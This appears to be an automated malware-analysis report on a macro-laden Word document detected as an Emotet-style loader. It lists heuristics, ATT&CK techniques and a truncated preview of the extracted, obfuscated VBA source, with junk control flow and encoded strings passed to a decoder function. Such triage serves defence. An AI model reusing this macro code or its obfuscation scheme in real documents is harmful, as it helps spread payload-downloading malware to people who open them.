MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristics related to VBA macros, including the presence of an AutoOpen macro and CreateObject calls. The embedded VBA script, named 'macros.bas', is obfuscated but its structure suggests it is designed to download and execute a second-stage payload from a remote source, indicated by the GTrOMw function calls which likely decode and retrieve content. The AutoOpen macro is a common technique for executing malicious code upon opening a document.
Heuristics 7
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71693 bytes |
SHA-256: e8e6765d37fa7939d3002589b3578812538c4d06ca5763aef1e95b6c683453a4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 23 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cbmXwjJVIhMSC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GrKXXbD"
Function RBhqVsi()
On Error Resume Next
Select Case PUOZj
Case 88532
HSrJoh = uqifa
BbGYK = mZbJaU
FzFhH = Cos(42454 * CBool(70152))
Case 48351
wFwOC = 25938
XTiIQ = Fix(30401)
OpPnHW = Oct(62363)
End Select
zGZWJBkQ = GTrOMw("4G3oqAiBgMAQDAjBwYAQGA2AANAIGAyAQOAQDAmBwMAQGAjBAMAUDAiBAZAADAwAQYAM3mC", 4 + 0, 63 + 0)
Select Case RoScV
Case 79549
XJqzz = BZvsYG
pvLFp = rrric
XqnJw = Cos(51282 * CBool(84288))
Case 57695
wVSQR = 21347
QTviP = Fix(55711)
VcNmJ = Oct(96586)
End Select
Select Case JszGw
Case 42573
KaZLHJ = mKLID
EACrw = QvDhjo
EiZKZ = Cos(36410 * CBool(49191))
Case 71819
DZkkR = 47149
KVTcJ = Fix(98876)
qIKwF = Oct(3389)
End Select
uMYQoithi = GTrOMw("JMFQOAMDAxAQMAMGAjBwNAIGAhBwNAEDAkBQNAUGAlBgMAcDAhBAZAkDAkBQOAkDA0AQZAYDAwAAOAIGA3AwYAIGA4AQZAkDAmBgNAEGAjBAZAcDA3AgZAADA1AwMAEGAwAwYAQGA5AgYAQGAyAQYAIDA1Ag96%P2k", 7 + 0, 153 + 0)
Select Case stXtF
Case 54037
Ampdj = wdGLjs
tMMMEE = jCOUU
wKfMrM = Cos(93111 * CBool(79141))
Case 20262
dwdAMN = 2177
RNHOfh = Fix(21329)
BHczXV = Oct(18267)
End Select
Select Case HtnFpZ
Case 7521
wEqOqF = FqmLi
PPLoK = JkZYR
QzDTNM = Cos(91817 * CBool(25373))
Case 59186
nbuPn = 12068
jmjVO = Fix(84147)
bQiPts = Oct(48313)
End Select
jjfRlSmnM = GTrOMw("Jk5iDA3AAOAQGA5AgMAgDA0AgZAYGA2AwNAMDA3AwYAUGAzAQNAUGAlBQYAUDAjBANAMDA1AQOAUGA0AAOAADA2AAZAMDA2AAZAEGA5AgYAADA2AgNAkDA3AQMAYGA1AAMAYDA5AQOAQDAjBAZAIGAkBQYAYGA5AQYAEGAlBgNAQGAjBQOAEDA2AQZAIDAiBgZAYk2", 3 + 0, 192 + 0)
Select Case YVZFMl
Case 55884
PVoOb = uvWDXq
iXCHYr = hjTmcG
Zphtb = Cos(11825 * CBool(24454))
Case 37199
ZdCrW = 68700
qUivqw = Fix(44502)
ntjsjC = Oct(3761)
End Select
Select Case YPnoUa
Case 79462
nwXqH = wcJoSw
ojiDj = IcpzVk
NqQapd = Cos(79748 * CBool(1270))
Case 33845
QzRbpT = 70336
Wnzki = Fix(18067)
nzjvwA = Oct(4904)
End Select
RwGTXIQ = GTrOMw("nLtgYAEDA4AAOAADA2AQOAcDnQzYwY", 7 + 0, 21 + 0)
Select Case NdFMi
Case 96501
HBWsNE = wTJFq
wwdIGq = dJFTn
tDwjH = Cos(3208 * CBool(16816))
Case 65769
wNpvfY = 2366
mtJEJ = Fix(33386)
zFswKw = Oct(92826)
End Select
Select Case hPpPb
Case 38059
kCVrUP = Ibtqf
jJFuo = flvFvK
cwisD = Cos(11140 * CBool(65572))
Case 91133
ZUjEnp = 82733
cCCda = Fix(47327)
vbdow = Oct(79064)
End Select
QwfviAiwIj = GTrOMw("lUcjIDA5AwMAADAmBgNAIGAkBwMAMDAhBwMAMDAkBwMAIGA4AwMAYDAyAAOAYGAhBQOAYDAhBQZAIGA5AQYAIDA0AQNAEGAwAQMAQGAxAQMAcDAxAQMAYDA0AQYAcDAjBAOAUIX3Y.", 6 + 0, 129 + 0)
Select Case ajDmLd
Case 67629
kzbnkl = jLpuc
sInBXU = bctwDc
DAAiNj = Cos(73548 * CBool(35091))
Case 8714
noXkr = 33568
CMShYP = Fix(71203)
ImOHEc = Oct(68915)
End Select
Select Case LCRib
Case 9926
bWiEL = snsWt
puKjw = JJUsY
rQTLA = Cos(88370 * CBool(85260))
Case 6387
EEWOcR = 86387
jjYaB = Fix(27272)
BSThR = Oct(91104)
End Se
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.